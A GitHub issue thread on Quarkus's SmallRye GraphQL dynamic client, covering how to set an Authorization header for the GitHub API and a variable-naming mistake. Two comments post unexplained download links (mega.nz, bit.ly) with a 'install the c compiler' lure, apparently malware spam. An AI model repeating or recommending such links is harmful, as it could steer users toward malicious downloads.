### ISSUE TITLE
smallrye-graphql-client - Dynamic mode - Authentification

### ISSUE THREAD

**Issue by jeanphi-baconnais** [quarkusio/quarkus#43388]
### Describe the bug

Hello 👋 

For the same usage of [this issue](https://github.com/quarkusio/quarkus/issues/43385), I tried to call the GitHub GraphQL Api with the dynamic method.

After injecting the DynamicGraphQLClient,  

```
    @Inject
    @GraphQLClient("github-api-dynamic")
    DynamicGraphQLClient dynamicGraphQLClient;

```

I declared and prepare my query 
```
var variables = new HashMap<String, Object>(); // <3>
            variables.put("$login", login);
            
            response = dynamicGraphQLClient.executeSync("""
                  query getUserContributions($login: String) { 
                    user(login: $login) {
                        contributionsCollection {
                            totalIssueContributions,
                            totalCommitContributions,
                            totalPullRequestContributions,
                            totalPullRequestReviewContributions,
                            totalRepositoryContributions
                        }
                    } 
                }
              """, variables);
```

And I get an error of Authorization header. To configure this, I tried different things 😅  

```
quarkus.smallrye-graphql-client."github-api-dynamic".url=https://api.github.com/graphql
quarkus.smallrye-graphql-client."github-api-dynamic".header."Authorization"="Bearer xxxx"
quarkus.smallrye-graphql-client."github-api-dynamic".header.AUTHORIZATION="Bearer xxx"
quarkus.smallrye-graphql-client."github-api-dynamic".header."AUTHORIZATION"="Bearer xxx"

quarkus.smallrye-graphql-client.github-api-dynamic.url=https://api.github.com/graphql
quarkus.smallrye-graphql-client.github-api-dynamic.header."Authorization"="Bearer xxx"
quarkus.smallrye-graphql-client.github-api-dynamic.header.AUTHORIZATION="Bearer xxx"
quarkus.smallrye-graphql-client.github-api-dynamic.header."AUTHORIZATION"="Bearer xxx"
```

 In [this documentation](https://quarkus.io/guides/smallrye-graphql-client#using-the-dynamic-client), I found this line : 
`quarkus.smallrye-graphql-client.star-wars-dynamic.header.HEADER-KEY=HEADER-VALUE"`

It seems I respect the format 🤔  Have you got an example please ? Maybe I can contribute to this documentation to add explications (and fix the " not closed) when I success to do this.

Thanks 🙏  

### Output of `uname -a` or `ver`

Darwin Kernel Version 23.6.0 root:xnu-10063.141.2~1/RELEASE_X86_64 x86_64

### Output of `java -version`

OpenJDK 64-Bit Server VM Temurin-17.0.11+9 (build 17.0.11+9, mixed mode)

### Quarkus version or git rev

3.12.1

### Build tool (ie. output of `mvnw --version` or `gradlew --version`)

Apache Maven 3.8.6 (84538c9988a25aec085021c365c560670ad80f63)

**Comment by achilles0x** [comment]
download

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ

you may need to install the c compiler

**Comment by nourakhy** [comment]
I think this will help you.
https://bit.ly/4evXrQ6

you may need to install the c compiler

**Comment by jeanphi-baconnais** [comment]
Install the C compiler ? 😄 wow I think your hidden link is just a spam

**Comment by sberyozkin** [comment]
@jeanphi-baconnais I'm not sure it can help in your case, but you can use 
https://quarkus.io/guides/security-openid-connect-client-reference#quarkus-oidc-client-graphql

It is an integration between `quarkus-smallrye-graphql` and `quarkus-oidc-client` done by @jmartisk.

The difference with your configuration is that you'd configure, instead, how to get that token, and it will be used but also refreshed for you

**Comment by jmartisk** [comment]
@sberyozkin I think that would require obtaining the token from an OIDC server, but for GitHub, the user probably just copy-pasted it from the webpage

**Comment by jeanphi-baconnais** [comment]
> ```
> quarkus.smallrye-graphql-client.github-api-dynamic.header.Authorization=Bearer xxxx
> ```
> 
> should work, doesn't it? You shouldn't need any `"` here

Oh, it's better without `"`. I tested a lot of things but not this one. In documentation I saw one `"` and I was focus on this.

I have another error, I keep this issue opened, I will try to work on this as soon.

Thanks again for your reactivity 🙏

**Comment by jmartisk** [comment]
Ah yes, the extra `"` in the documentation is wrong. If you want, send a PR :)

**Comment by jeanphi-baconnais** [comment]
> Ah yes, the extra `"` in the documentation is wrong. If you want, send a PR :)

Yes, I will do this 😁

**Comment by jmartisk** [comment]
It doesn't work when you simply add the `!` in  your query, like
```
query getUserContributions($login: String!) { 
```
?

**Comment by jeanphi-baconnais** [comment]
No 🤷 
<img width="920" alt="image" src="https://github.com/user-attachments/assets/9c64e0b2-5eae-453a-b8d1-b0b5f7d8fe84">

**Comment by jeanphi-baconnais** [comment]
Oh, I got it, I set a variable "$login" and not "login" 🫠

Sorry by this, in documentation I can correctly see `variables.put("loc", "Outer Space");` ([here](https://smallrye.io/smallrye-graphql/2.8.6/dynamic-client-usage/)

I can close this issue and thank you again for your time !
